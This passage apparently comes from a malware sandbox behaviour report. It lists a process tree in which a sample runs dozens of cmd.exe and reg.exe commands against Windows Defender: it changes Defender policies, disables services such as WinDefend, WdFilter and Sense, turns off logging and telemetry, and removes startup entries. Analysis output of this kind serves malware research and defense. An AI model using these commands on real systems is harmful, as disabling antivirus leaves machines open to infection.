  2⤵
  PID:4048
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableRemovableDriveScanning /t REG_DWORD /d 1 /f
    3⤵
    PID:6372
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableRestorePoint /t REG_DWORD /d 1 /f"
  2⤵
  PID:3740
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableRestorePoint /t REG_DWORD /d 1 /f
    3⤵
    PID:2540
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableScanningMappedNetworkDrivesForFullScan /t REG_DWORD /d 1 /f"
  2⤵
  PID:404
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableScanningMappedNetworkDrivesForFullScan /t REG_DWORD /d 1 /f
    3⤵
    PID:6488
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableScanningNetworkFiles /t REG_DWORD /d 1 /f"
  2⤵
  PID:3956
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableScanningNetworkFiles /t REG_DWORD /d 1 /f
    3⤵
    PID:9068
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v PurgeItemsAfterDelay /t REG_DWORD /d 0 /f"
  2⤵
  PID:4676
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v PurgeItemsAfterDelay /t REG_DWORD /d 0 /f
    3⤵
    PID:8364
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v ScanOnlyIfIdle /t REG_DWORD /d 0 /f"
  2⤵
  PID:3220
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v ScanOnlyIfIdle /t REG_DWORD /d 0 /f
    3⤵
    PID:896
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v ScanParameters /t REG_DWORD /d 0 /f"
  2⤵
  PID:2276
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v ScanParameters /t REG_DWORD /d 0 /f
    3⤵
    PID:8468
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v ScheduleDay /t REG_DWORD /d 8 /f"
  2⤵
  PID:4040
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v ScheduleDay /t REG_DWORD /d 8 /f
    3⤵
    PID:7348
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v ScheduleTime /t REG_DWORD /d 0 /f"
  2⤵
  PID:2336
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v ScheduleTime /t REG_DWORD /d 0 /f
    3⤵
    PID:8728
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v DisableUpdateOnStartupWithoutEngine /t REG_DWORD /d 1 /f"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4832
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v DisableUpdateOnStartupWithoutEngine /t REG_DWORD /d 1 /f
    3⤵
    PID:6124
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v ScheduleDay /t REG_DWORD /d 8 /f"
  2⤵
  PID:796
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v ScheduleDay /t REG_DWORD /d 8 /f
    3⤵
    PID:8156
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v ScheduleTime /t REG_DWORD /d 0 /f"
  2⤵
  PID:4516
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v ScheduleTime /t REG_DWORD /d 0 /f
    3⤵
    PID:6068
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v SignatureUpdateCatchupInterval /t REG_DWORD /d 0 /f"
  2⤵
  PID:4924
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v SignatureUpdateCatchupInterval /t REG_DWORD /d 0 /f
    3⤵
    PID:9084
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v DisableBlockAtFirstSeen /t REG_DWORD /d 1 /f"
  2⤵
  PID:1952
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v DisableBlockAtFirstSeen /t REG_DWORD /d 1 /f
    3⤵
    PID:8840
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v LocalSettingOverrideSpynetReporting /t REG_DWORD /d 0 /f"
  2⤵
  PID:3668
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v LocalSettingOverrideSpynetReporting /t REG_DWORD /d 0 /f
    3⤵
    PID:8140
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SpyNetReporting /t REG_DWORD /d 0 /f"
  2⤵
  PID:3448
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SpyNetReporting /t REG_DWORD /d 0 /f
    3⤵
    PID:9012
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SpyNetReportingLocation /t REG_MULTI_SZ /d 0 /f"
  2⤵
  PID:4960
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SpyNetReportingLocation /t REG_MULTI_SZ /d 0 /f
    3⤵
    PID:9172
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SubmitSamplesConsent /t REG_DWORD /d 2 /f"
  2⤵
  PID:4956
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SubmitSamplesConsent /t REG_DWORD /d 2 /f
    3⤵
    PID:8856
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\Sense /v Start /t REG_DWORD /d 4 /f
  2⤵
  PID:1516
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Services\Sense /v Start /t REG_DWORD /d 4 /f
    3⤵
    - Modifies registry key
    PID:8132
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\WinDefend /v Start /t REG_DWORD /d 4 /f
  2⤵
  PID:2224
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Services\WinDefend /v Start /t REG_DWORD /d 4 /f
    3⤵
    - Modifies security service
    - Modifies registry key
    PID:3856
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\MsSecFlt /v Start /t REG_DWORD /d 4 /f"
  2⤵
  PID:3364
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Services\MsSecFlt /v Start /t REG_DWORD /d 4 /f"
    3⤵
    PID:8628
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService /v Start /t REG_DWORD /d 4 /f
  2⤵
  PID:4852
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService /v Start /t REG_DWORD /d 4 /f
    3⤵
    - Modifies Security services
    PID:9008
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\WdBoot /v Start /t REG_DWORD /d 4 /f
  2⤵
  PID:4840
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Services\WdBoot /v Start /t REG_DWORD /d 4 /f
    3⤵
    - Modifies Security services
    PID:9180
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\WdFilter /v Start /t REG_DWORD /d 4 /f
  2⤵
  PID:3968
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Services\WdFilter /v Start /t REG_DWORD /d 4 /f
    3⤵
    - Modifies Security services
    - Modifies registry key
    PID:5004
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\WdNisDrv /v Start /t REG_DWORD /d 4 /f
  2⤵
  PID:1592
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Services\WdNisDrv /v Start /t REG_DWORD /d 4 /f
    3⤵
    - Modifies Security services
    - System Location Discovery: System Language Discovery
    - Modifies registry key
    PID:4800
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\WdNisSvc /v Start /t REG_DWORD /d 4 /f
  2⤵
  PID:4504
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Services\WdNisSvc /v Start /t REG_DWORD /d 4 /f
    3⤵
    - Modifies Security services
    PID:8352
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Control\WMI\Autologger\DefenderApiLogger /v Start /t REG_DWORD /d 0 /f
  2⤵
  PID:4008
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Control\WMI\Autologger\DefenderApiLogger /v Start /t REG_DWORD /d 0 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3080
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Control\WMI\Autologger\DefenderAuditLogger /v Start /t REG_DWORD /d 0 /f
  2⤵
  PID:2552
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Control\WMI\Autologger\DefenderAuditLogger /v Start /t REG_DWORD /d 0 /f
    3⤵
    PID:8244
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run /v SecurityHealth /t REG_BINARY /d 03,00,00,00,00,00,00,00,00,00,00,00 /f
  2⤵
  - An obfuscated cmd.exe command-line is typically used to evade detection.
  PID:3408
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run /v SecurityHealth /t REG_BINARY /d 03,00,00,00,00,00,00,00,00,00,00,00 /f
    3⤵
    - Modifies registry key
    PID:8464
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v SecurityHealt /f
  2⤵
  PID:3684
- - C:\Windows\SysWOW64\reg.exe
    reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v SecurityHealt /f
    3⤵
    PID:9092
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Microsoft\Windows Security Health\State" /v AccountProtection_MicrosoftAccount_Disconnected /f"
  2⤵
  PID:3128
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Microsoft\Windows Security Health\State" /v AccountProtection_MicrosoftAccount_Disconnected /f
    3⤵
    PID:6416
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v DisableNotifications /f"
  2⤵
  PID:4280
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v DisableNotifications /f
    3⤵
    PID:4604
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v DisableEnhancedNotifications /f"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1552
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v DisableEnhancedNotifications /f
    3⤵
    PID:5228
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Microsoft\Windows Defender" /v DisableAntiSpyware /f"
  2⤵
  PID:4772
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Microsoft\Windows Defender" /v DisableAntiSpyware /f
    3⤵
    PID:8372
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Microsoft\Windows Defender" /v DisableAntiVirus /f"
  2⤵
  PID:3656
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Microsoft\Windows Defender" /v DisableAntiVirus /f
    3⤵
    PID:8172
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" /v FirstAuGracePeriod /f"
  2⤵
  PID:908
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" /v FirstAuGracePeriod /f
    3⤵
    PID:7444
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v DisablePrivacyMode /f"
  2⤵
  PID:2148
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v DisablePrivacyMode /f
    3⤵
    PID:8284
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg delete HKLM\SOFTWARE\Policies\Microsoft\MRT /v DontOfferThroughWUAU /f
  2⤵
  PID:2112
- - C:\Windows\SysWOW64\reg.exe
    reg delete HKLM\SOFTWARE\Policies\Microsoft\MRT /v DontOfferThroughWUAU /f
    3⤵
    - Modifies registry key
    PID:8616
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg delete HKLM\SOFTWARE\Policies\Microsoft\MRT /v DontReportInfectionInformation /f
  2⤵
  PID:2128
- - C:\Windows\SysWOW64\reg.exe
    reg delete HKLM\SOFTWARE\Policies\Microsoft\MRT /v DontReportInfectionInformation /f
    3⤵
    PID:8336
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Systray" /f"
  2⤵
  PID:4992
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Systray" /f
    3⤵
    PID:8016
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /f"
  2⤵
  PID:184
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /f
    3⤵
    PID:6208
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v PUAProtection /f"
  2⤵
  PID:4444
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v PUAProtection /f
    3⤵
    PID:5892
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v RandomizeScheduleTaskTimes /f"
  2⤵
  PID:3912
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v RandomizeScheduleTaskTimes /f
    3⤵
    PID:6376
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions" /v DisableAutoExclusions /f"
  2⤵
  PID:4920
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions" /v DisableAutoExclusions /f
    3⤵
    PID:6712
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\MpEngine" /v MpEnablePus /f"
  2⤵
  PID:2716
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\MpEngine" /v MpEnablePus /f
    3⤵
    PID:3932
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v LocalSettingOverridePurgeItemsAfterDelay /f"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3868
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v LocalSettingOverridePurgeItemsAfterDelay /f
    3⤵
    PID:8332
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v PurgeItemsAfterDelay /f"
  2⤵
  PID:2412
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v PurgeItemsAfterDelay /f
    3⤵
    PID:6196
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableBehaviorMonitoring /f"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4484
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableBehaviorMonitoring /f
    3⤵
    PID:5744
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableIOAVProtection /f"
  2⤵
  PID:2000
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableIOAVProtection /f
    3⤵
    PID:5156
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableOnAccessProtection /f"
  2⤵
  PID:2564
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableOnAccessProtection /f
    3⤵
    PID:8316
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /f"
  2⤵
  PID:1832
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:9076
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRoutinelyTakingAction /f"
  2⤵
  PID:4012
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRoutinelyTakingAction /f
    3⤵
    PID:8088
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableScanOnRealtimeEnable /f"
  2⤵
  PID:4220
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableScanOnRealtimeEnable /f
    3⤵
    PID:8188
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableScriptScanning /f"
  2⤵
  PID:64
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableScriptScanning /f
    3⤵
    PID:8652
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Remediation" /v Scan_ScheduleDay /f"
  2⤵
  PID:1388
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Remediation" /v Scan_ScheduleDay /f
    3⤵
    PID:6360
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Remediation" /v Scan_ScheduleTime /f"
  2⤵
  PID:1896
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Remediation" /v Scan_ScheduleTime /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4452
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v AdditionalActionTimeOut /f"
  2⤵
  PID:4572
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v AdditionalActionTimeOut /f
    3⤵
    PID:5520
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v CriticalFailureTimeOut /f"
  2⤵
  PID:4272
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v CriticalFailureTimeOut /f
    3⤵
    PID:7020
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v DisableEnhancedNotifications /f"
  2⤵
  PID:1364
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v DisableEnhancedNotifications /f
    3⤵
    PID:8568
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v DisableGenericRePorts /f"
  2⤵
  PID:1840
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v DisableGenericRePorts /f
    3⤵
    PID:5360
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v NonCriticalTimeOut /f"
  2⤵
  PID:2608
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v NonCriticalTimeOut /f
    3⤵
    PID:5192
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v AvgCPULoadFactor /f"
  2⤵
  PID:1956
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v AvgCPULoadFactor /f
    3⤵
    PID:5176
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableArchiveScanning /f"
  2⤵
  PID:2616
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableArchiveScanning /f
    3⤵
    PID:8824
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableCatchupFullScan /f"
  2⤵
  PID:2004
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableCatchupFullScan /f
    3⤵
    PID:8880
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableCatchupQuickScan /f"
  2⤵
  PID:2400
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableCatchupQuickScan /f
    3⤵
    PID:8028
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableRemovableDriveScanning /f"
  2⤵
  PID:1996
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableRemovableDriveScanning /f
    3⤵
    PID:5188
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableRestorePoint /f"
  2⤵
  PID:2824
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableRestorePoint /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:8332
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableScanningMappedNetworkDrivesForFullScan /f"
  2⤵
  PID:2876
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableScanningMappedNetworkDrivesForFullScan /f
    3⤵
    PID:8124
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableScanningNetworkFiles /f"
  2⤵
  PID:4980
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableScanningNetworkFiles /f
    3⤵
    PID:8092
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v PurgeItemsAfterDelay /f"
  2⤵
  PID:4208
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v PurgeItemsAfterDelay /f
    3⤵
    PID:8356
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v ScanOnlyIfIdle /f"
  2⤵
  PID:1700
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v ScanOnlyIfIdle /f
    3⤵
    PID:8584
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v ScanParameters /f"
  2⤵
  PID:3508
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v ScanParameters /f
    3⤵
    PID:8324
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v ScheduleDay /f"
  2⤵
  PID:1036
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v ScheduleDay /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:8580
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v ScheduleTime /f"
  2⤵
  PID:4580
- - C:\Windows\SysWOW64\reg.exe
